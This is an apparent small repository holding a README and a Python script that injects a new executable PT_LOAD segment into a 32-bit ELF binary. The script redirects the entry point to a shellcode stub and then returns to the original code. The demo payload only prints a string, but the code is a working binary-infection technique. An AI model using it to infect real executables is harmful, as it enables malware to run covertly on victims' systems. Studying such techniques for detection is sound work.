├── README.md
└── main.py
/README.md:
--------------------------------------------------------------------------------
# PT_LOAD Injector
This injector was developed in Python using the lief, pwntools and argparse libraries. Therefore, these libraries must be installed on your device.

(Python 3.10.x)

```
pip install lief
pip install pwntools
pip install argparse
```

# Usage & Output
```
➜ ~ ./test
Infect Me !
➜ ~ python3 main.py -f ./test
Shellcode size: 53
[+] Segment added
[+] Real EntryPoint: 0x8049070
[+] New EntryPoint: 0x10004000
➜ ~ ls
main.py test test.c test_infected
➜ ~ chmod +x test_infected
➜ ~ ./test_infected
this must be rhotav!
Infect Me !
```
--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
"""
PT_LOAD Injection with Python and LIEF

Author: @rhotav

MALWATION
"""

import lief
from pwn import *
import argparse

def main():
    """Append an executable PT_LOAD segment to an ELF and point e_entry at it.

    Reads the input ELF named by ``-f``, builds a small i386 stub that writes
    ``payload`` to fd 1 and then jumps to the original entry point, adds the
    stub as a new LOAD segment, rewrites the header entry point, and writes
    the result to ``-o`` or ``<input>_infected``.
    """
    # -f is mandatory, so argparse itself exits with a usage error when it is
    # missing; -o is the optional output path.
    parser = argparse.ArgumentParser()
    parser.add_argument("-f", help="Binary to infect", required = True)
    parser.add_argument("-o", help="Output file")
    args = parser.parse_args()

    # Effectively unreachable: parse_args() above already exits when -f is
    # absent, and an argparse Namespace has no print_help() (that method is
    # on `parser`). Note `sys` is never imported explicitly here; it is only
    # in scope through `from pwn import *`.
    if len(sys.argv) < 2:
        args.print_help()
        exit(0)

    # Text the injected stub writes to stdout before returning control.
    payload = "this must be rhotav!\n"
    binary = lief.parse(args.f)

    # Stub layout: preserve edx in esi, write(1, payload, len(payload)),
    # restore edx, then push the ORIGINAL entry point and `ret` into it so the
    # host program still runs. shellcraft.i386 means this targets 32-bit ELF;
    # context.arch is not set explicitly, so pwntools' default is presumably
    # relied on — TODO confirm.
    shellcode = asm("mov esi, edx")
    shellcode += asm(shellcraft.i386.write(1, payload, len(payload)))
    shellcode += asm(f"""
    mov edx, esi
    push {hex(binary.header.entrypoint)}
    ret
    """)

    print("Shellcode size: ", len(shellcode))

    # The first Segment() is discarded by the second assignment (redundant).
    segment = lief.ELF.Segment()
    segment = lief.ELF.Segment()
    segment.type = lief.ELF.SEGMENT_TYPES.LOAD
    # Execute-only: no R/W bits are set on the new segment.
    segment.flags = lief.ELF.SEGMENT_FLAGS.X
    segment.content = bytearray(shellcode)
    # 0x999 is not a meaningful alignment (not a power of two); it serves as a
    # marker so the loop below can find this segment again after LIEF has
    # assigned it a virtual address. From a triage standpoint, an execute-only
    # PT_LOAD with a non-power-of-two p_align and an e_entry that points into
    # it rather than into the original text segment is exactly the kind of
    # header anomaly an ELF scanner can flag.
    segment.alignment = 0x999
    binary.add(segment)

    print("[+] Segment added")

    print("[+] Real EntryPoint: ", hex(binary.header.entrypoint))

    # Locate the segment just added via its marker alignment and redirect the
    # header entry point to its start. The stub itself carries the original
    # entry point (pushed above), so execution chains back to the real code.
    for seg in binary.segments:
        if seg.type == lief.ELF.SEGMENT_TYPES.LOAD and \
            seg.alignment == 0x999:
            binary.header.entrypoint = seg.virtual_address
            break

    print("[+] New EntryPoint: ", hex(binary.header.entrypoint))

    # Write next to the input with an "_infected" suffix unless -o was given.
    if args.o:
        binary.write(args.o)
    else:
        binary.write(args.f + "_infected")

if __name__ == "__main__":
    main()
--------------------------------------------------------------------------------